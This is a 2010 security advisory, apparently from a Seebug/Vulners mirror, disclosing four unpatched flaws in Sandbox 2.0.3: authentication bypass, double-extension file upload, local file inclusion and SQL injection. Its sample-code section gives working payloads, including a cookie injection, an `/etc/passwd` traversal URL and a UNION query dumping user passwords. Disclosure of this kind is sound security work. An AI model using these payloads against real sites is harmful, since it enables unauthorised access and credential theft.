Search...

Sandbox 2.0.3 Multiple Remote Vulnerabilities

2010-07-07T00:00:00

ID SSV:19911
Type seebug
Reporter Root
Modified 2010-07-07T00:00:00

Description

No description provided by source.

                                        
                                            
                                                Sandbox 2.0.3 Multiple Remote Vulnerabilities
 
 Name              Sandbox
 Vendor            http://www.iguanadons.net
 Versions Affected 2.0.3
 
 Author            Salvatore Fresta aka Drosophila
 Website           http://www.salvatorefresta.net
 Contact           salvatorefresta [at] gmail [dot] com
 Date              2010-07-07
 
X. INDEX
 
 I.    ABOUT THE APPLICATION
 II.   DESCRIPTION
 III.  ANALYSIS
 IV.   SAMPLE CODE
 V.    FIX
  
 
I. ABOUT THE APPLICATION
________________________
 
Sandbox is a personal website package that provides  you
with a blog, image gallery, file downloads area, and the
ability  to   create   miscellaneous   custom  webpages.
 
 
II. DESCRIPTION
_______________
 
Some parameters are not sanitised  before  being  used in
SQL queries and in danger PHP's functions.
The vulnerabilities are reported in version 2.0.3.  Other
versions may also be affected.
 
 
III. ANALYSIS
_____________
 
Summary:
 
 A) Authentication Bypass
 B) Arbitrary File Upload
 C) Local File Inclusion
 D) SQL Injection
  
 
A) Authentication Bypass
________________________
 
The  sandbox_pass's  cookie  value  in  global.php is not
properly  sanitised  before  being  used  in a SQL query.
Since  this  value   is   used   for  the  authentication
system, the injection can be used to bypass it.
Successful exploitation  requires that &quot;magic_quotes_gpc&quot;
is disabled.
 
 
B) Arbitrary File Upload
________________________
 
When a file is sent to blog.php (and also to profile.php)
a bad check for extension is did. The  check  consists in
dividing  the  file's name  in  substrings delimited by a
point  and  checking  if  the second substring's value is
present in the white list. This  method  works fine for a
file with a single extension,  but  if an attacker uses a
file with  a  double  extension, this method doesn't work
well. The following is the affected code in blog.php:
 
$fname = $this-&gt;files['image_file']['tmp_name'];
$system = explode( '.', $this-&gt;files['image_file']['name'] );
$system[1] = strtolower($system[1]);
 
if ( !preg_match( '/jpg|jpeg|png|gif/', $system[1] ) ) {
    NO UPLOAD
} else {
    UPLOAD
}
 
If the file's name is evil.jpg.php: $system[1] = jpg
 
 
C) Local File Inclusion
_______________________
 
The  a  parameter  in admin.php is not properly sanitised
before  being  used  in  the  require()  PHP's  function.
This  can  be  exploited  to include arbitrary files from
local  resources  via  directory  traversal  attacks  and
URL-encoded NULL bytes.
 
 
D) SQL Injection
________________
 
The  p  parameter  in modules/page.php  is  not  properly
sanitised before being used in a SQL query. This  can  be
exploited  to  manipulate   SQL  queries   by   injecting
arbitrary SQL code.
 
 
IV. SAMPLE CODE
_______________
 
A) Authentication Bypass
 
cookie: sandbox_pass = 1' OR '1'='1'#
cookie: sandbox_user = userid (1 for admin)
 
 
B) Arbitrary File Upload
 
Upload a file with a double extension.
 
 
C) Local File Inclusion
 
http://site/path/admin.php?a=../../../../../../../etc/passwd%00
 
 
D) SQL Injection
 
http://site/path/index.php?a=page&amp;p=-1 UNION SELECT 1,2,3,4,5,6,7,CONCAT(user_name,0x3a,user_password) FROM sb_users
 
 
V. FIX
______
 
No fix.

JSON Vulners Source

Initial Source

{"href": "https://www.seebug.org/vuldb/ssvid-19911", "status": "poc", "bulletinFamily": "exploit", "modified": "2010-07-07T00:00:00", "title": "Sandbox 2.0.3 Multiple Remote Vulnerabilities", "cvss": {"vector": "NONE", "score": 0.0}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-19911", "cvelist": [], "description": "No description provided by source.", "viewCount": 2, "published": "2010-07-07T00:00:00", "sourceData": "\n Sandbox 2.0.3 Multiple Remote Vulnerabilities\r\n \r\n Name Sandbox\r\n Vendor http://www.iguanadons.net\r\n Versions Affected 2.0.3\r\n \r\n Author Salvatore Fresta aka Drosophila\r\n Website http://www.salvatorefresta.net\r\n Contact salvatorefresta [at] gmail [dot] com\r\n Date 2010-07-07\r\n \r\nX. INDEX\r\n \r\n I. ABOUT THE APPLICATION\r\n II. DESCRIPTION\r\n III. ANALYSIS\r\n IV. SAMPLE CODE\r\n V. FIX\r\n \r\n \r\nI. ABOUT THE APPLICATION\r\n________________________\r\n \r\nSandbox is a personal website package that provides you\r\nwith a blog, image gallery, file downloads area, and the\r\nability to create miscellaneous custom webpages.\r\n \r\n \r\nII. DESCRIPTION\r\n_______________\r\n \r\nSome parameters are not sanitised before being used in\r\nSQL queries and in danger PHP's functions.\r\nThe vulnerabilities are reported in version 2.0.3. Other\r\nversions may also be affected.\r\n \r\n \r\nIII. ANALYSIS\r\n_____________\r\n \r\nSummary:\r\n \r\n A) Authentication Bypass\r\n B) Arbitrary File Upload\r\n C) Local File Inclusion\r\n D) SQL Injection\r\n \r\n \r\nA) Authentication Bypass\r\n________________________\r\n \r\nThe sandbox_pass's cookie value in global.php is not\r\nproperly sanitised before being used in a SQL query.\r\nSince this value is used for the authentication\r\nsystem, the injection can be used to bypass it.\r\nSuccessful exploitation requires that "magic_quotes_gpc"\r\nis disabled.\r\n \r\n \r\nB) Arbitrary File Upload\r\n________________________\r\n \r\nWhen a file is sent to blog.php (and also to profile.php)\r\na bad check for extension is did. The check consists in\r\ndividing the file's name in substrings delimited by a\r\npoint and checking if the second substring's value is\r\npresent in the white list. This method works fine for a\r\nfile with a single extension, but if an attacker uses a\r\nfile with a double extension, this method doesn't work\r\nwell. The following is the affected code in blog.php:\r\n \r\n$fname = $this->files['image_file']['tmp_name'];\r\n$system = explode( '.', $this->files['image_file']['name'] );\r\n$system[1] = strtolower($system[1]);\r\n \r\nif ( !preg_match( '/jpg|jpeg|png|gif/', $system[1] ) ) {\r\n NO UPLOAD\r\n} else {\r\n UPLOAD\r\n}\r\n \r\nIf the file's name is evil.jpg.php: $system[1] = jpg\r\n \r\n \r\nC) Local File Inclusion\r\n_______________________\r\n \r\nThe a parameter in admin.php is not properly sanitised\r\nbefore being used in the require() PHP's function.\r\nThis can be exploited to include arbitrary files from\r\nlocal resources via directory traversal attacks and\r\nURL-encoded NULL bytes.\r\n \r\n \r\nD) SQL Injection\r\n________________\r\n \r\nThe p parameter in modules/page.php is not properly\r\nsanitised before being used in a SQL query. This can be\r\nexploited to manipulate SQL queries by injecting\r\narbitrary SQL code.\r\n \r\n \r\nIV. SAMPLE CODE\r\n_______________\r\n \r\nA) Authentication Bypass\r\n \r\ncookie: sandbox_pass = 1' OR '1'='1'#\r\ncookie: sandbox_user = userid (1 for admin)\r\n \r\n \r\nB) Arbitrary File Upload\r\n \r\nUpload a file with a double extension.\r\n \r\n \r\nC) Local File Inclusion\r\n \r\nhttp://site/path/admin.php?a=../../../../../../../etc/passwd%00\r\n \r\n \r\nD) SQL Injection\r\n \r\nhttp://site/path/index.php?a=page&p=-1 UNION SELECT 1,2,3,4,5,6,7,CONCAT(user_name,0x3a,user_password) FROM sb_users\r\n \r\n \r\nV. FIX\r\n______\r\n \r\nNo fix.\n ", "id": "SSV:19911", "enchantments_done": [], "type": "seebug", "lastseen": "2017-11-19T18:19:55", "reporter": "Root", "enchantments": {"score": {"value": -0.5, "vector": "NONE", "modified": "2017-11-19T18:19:55", "rev": 2}, "dependencies": {"references": [], "modified": "2017-11-19T18:19:55", "rev": 2}, "vulnersScore": -0.5}, "references": []}